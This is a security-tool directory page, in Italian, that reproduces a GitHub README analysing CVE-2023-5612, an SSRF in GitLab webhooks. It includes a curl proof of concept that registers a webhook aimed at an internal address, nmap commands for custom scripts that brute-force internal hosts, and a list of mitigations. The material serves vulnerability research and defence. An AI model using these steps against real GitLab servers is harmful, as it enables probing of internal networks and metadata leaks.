Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Review.CVE-2023-5612 — Analisi tramite script CVE-2023-5612 | Kitploit
Strumenti/GitHubGitHub/topskiypavelqwertygang/review.cve-2023-5612
RicognizioneMappatura della ReteAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubtopskiypavelqwertygang/review.cve-2023-5612

Review.CVE-2023-5612

Analisi tramite script CVE-2023-5612

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
451 anno faNon ancora revisionato
Condividi

CVE-2023-5612 – SSRF di GitLab tramite URL Webhook (PoC e Analisi)

📌 Panoramica CVE

  • ID CVE: CVE-2023-5612
  • Gravità: Alta (CVSS: 8.1 Punteggio Base)
  • Tipo: Server-Side Request Forgery (SSRF)
  • Componente: Webhook di GitLab CE/EE
  • Versioni Affette: GitLab CE/EE < 16.2.7, 16.3 < 16.3.4, 16.4 < 16.4.1

🧠 Descrizione

Una vulnerabilità SSRF in GitLab CE/EE consente a malintenzionati con accesso valido come Maintainer del progetto di inviare richieste artefatte a servizi interni arbitrari tramite URL di webhook malevoli. Lo sfruttamento porta a scansione della rete interna, fuga di metadati o ulteriore pivot.


✅ Condizioni di Sfruttamento

  • L'attaccante ha accesso maintainer al progetto
  • GitLab non ha filtri rigidi o validazione degli URL dei webhook

⚙️ Passaggi del PoC (Manuale)

root@kitploit:~
curl -s --header "PRIVATE-TOKEN: <TOKEN>" \
     --data-urlencode "url=http://127.0.0.1:8888" \
     http://<gitlab-host>:8080/api/v4/projects/<project_id>/hooks

🧱 Ambiente e Configurazione

root@kitploit:~
- Kali Linux all'interno di una macchina virtuale, appositamente predisposta per il test
- Un'istanza vulnerabile di GitLab CE avviata tramite Docker (porta 8080)
- All'interno di GitLab:
- Creato un progetto di test
- Generato un Personal Access Token (glpat-...) con diritti di Maintainer
- Per il target SSRF interno è stato avviato un servizio HTTP minimale su 127.0.0.1:8888

🧠 Metodologia

root@kitploit:~
- Conferma manuale della vulnerabilità tramite curl (vedi PoC)
- Creazione di script NSE personalizzati:
gitlab-ssrf.nse: verifica puntuale della SSRF
gitlab-ssrf-brute.nse: brute forcing automatico di indirizzi interni
- Test con nmap -d e --script-trace, per analizzare il comportamento dell'API e registrare i risultati
- Ricezione di risposta 401 Unauthorized dal servizio interno, indicante una SSRF riuscita
- Una richiesta riuscita restituirà `201 Created` oppure un errore del tipo `401 Unauthorized`, che indica un accesso SSRF.

🛠 Script NSE (Attivazione Manuale)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

🧪 Script NSE (Brute Force su URL Interni)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf-brute.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

📈 Conclusione

root@kitploit:~
Nel corso del lavoro sulla vulnerabilità **CVE-2023-5612** è stato riprodotto con successo uno scenario di attacco SSRF con accesso a indirizzi interni attraverso l'API di GitLab CE. Ciò dimostra quanto sia importante limitare le capacità dei webhook e implementare la validazione degli URL lato server.

🎯 Obiettivo raggiunto:

  • SSRF confermata
  • Toolkit NSE implementato
  • Progetto documentato e reso open source

📂 Struttura del Repository

root@kitploit:~
.
├── gitlab-ssrf.nse             # Script NSE per verifica manuale della SSRF
├── gitlab-ssrf-brute.nse       # Script NSE brute force per scansione host/porte interni
├── screenshots/                # Screenshot dell'esecuzione del PoC e conferma della vulnerabilità
└── README.md                   # Questo file

🖼 Screenshot

  • ✅ SSRF riuscita con risposta 401 Unauthorized
  • 📜 Log di nmap con esecuzione dello script
  • 📦 Aggiunta del webhook tramite API

⚠️ Mitigazione

  • Aggiornare GitLab a >= 16.2.7 / 16.3.4 / 16.4.1
  • Limitare il traffico HTTP in uscita tramite firewall di perimetro
  • Utilizzare liste di autorizzazione interne per i webhook

🧠 Autore e Contatti

Pavel Topskiy
GitHub • Analista di Sicurezza, Analista Red Team


📅 Cronologia

  • Giugno 2025: Analisi del PoC e della vulnerabilità
  • 5 Giugno 2025: Scrittura dello script NSE personalizzato e test

🔐 Disclaimer

Tutti i test sono stati eseguiti in ambienti di laboratorio isolati su versioni intenzionalmente vulnerabili. Non utilizzare contro sistemi non autorizzati. Rispettare i principi dell'hacking etico.

Scarica lo strumento